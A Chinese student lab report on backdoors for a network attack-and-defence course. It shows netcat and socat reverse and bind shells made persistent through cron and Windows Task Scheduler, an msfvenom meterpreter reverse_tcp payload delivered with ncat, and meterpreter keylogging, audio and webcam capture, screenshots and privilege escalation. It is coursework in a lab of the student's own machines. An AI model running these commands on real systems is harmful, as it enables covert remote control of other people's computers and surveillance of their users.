您的位置:首页 > 理论基础 > 计算机网络

20145337马月《网络对抗技术》后门原理与实践

2017-03-19 21:02 399 查看

20145337马月《网络对抗技术》后门原理与实践

问题回答

例举你能想到的一个后门进入到你系统中的可能方式?

安卓手机后门程序,能够远程卸载应用,清洗应用程序数据

例举你知道的后门如何启动起来(win及linux)的方式?

XP可将安装源光盘弹出,修改安装目录

windows 旧版本产生大量对外链接

绕过系统防火墙

安装嗅探工具,修改用户权限

放大镜程序

构造批处理脚本

Meterpreter有哪些给你映像深刻的功能?

功能强大,使用方便

如何发现自己有系统有没有被安装后门?

安装杀毒软件,定期扫描,查看任务管理器中来路不明的自启动进程

实践准备

本机地址



虚拟机地址



1.Windows 获取Linux Shell

在本机使用
ncat.exe -l -p 5337
命令监听特定的端口,后在KALI使用网络检测工具nc,
nc IP -e
来反向连接Windows 5337端口

运行
ls
指令



2.Linux获得Windows Shell

Linux运行nc 指令监听5337端口,windows反弹连接Linux

看到Windows的命令提示



利用nc传输数据





实验内容

一、使用netcat获取主机操作Shell,cron启动

corn启动:Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。


Windows下使用
ncat.exe -l -p 5337
命令监听特定的端口

查看cron的帮助文档



使用
crontab -e
指令 编辑定时任务,设置为每小时第25分向Windows 5337 端口发送反弹连接



查看定时任务



稍等一下



在14:25时,输入指令,得到Shell



二、使用socat获取主机操作Shell.任务计划启动

socat:socat是数据间的双向传输频道,每一个数据通道可能是一个文件,管道,设备套接字


socat的地址类型很多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等。


在windows系统中打开控制面板—管理工具-任务计划程序-创建任务-填写任务名称后新建触发器,如下图所示。



在操作-程序或脚本中选择socat.exe文件路径,在添加参数中写tcp-listen:5337 exec:cmd.exe,pty,stderr,即将cmd.exe绑定到5337端口,同时将cmd.exe的stderr重定向到stdout上。



运行



在linux中输入socat - tcp:IP:端口号(前两次是没有关闭360安全卫士和360杀毒)



三、使用MSF meterpreter生成可执行文件,利用ncat或者socat传送到主机并运行获取主机Shell

在kali中输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=端口号 -f exe >20145337.exe
生成后门程序:



ncat传输后门文件

windows系统使用ncat.exe -l 端口号 > 保存文件名监听准备接受文件;



kali系统使用ncat -nv 主机IP 端口号 < 文件名来发送指定文件;



查看主机中的后门软件



设置payload,并确认



开始监听



……未果,尝试了好几次,几次都因为粗心弄混了IP,重启后IP变了好气呀













启动成功,获得shell



四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

截获音频





时间只有2s,不是很清楚怎么设置时间

使用摄像头拍照(没有成功)



使用摄像头录像(好像也没成功)





截屏





击键记录



提权



实验总结与体会

通过这次实验,对网络安全的认识更进一步,实验自己也出现了不少问题,需要多次尝试和耐心解决
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: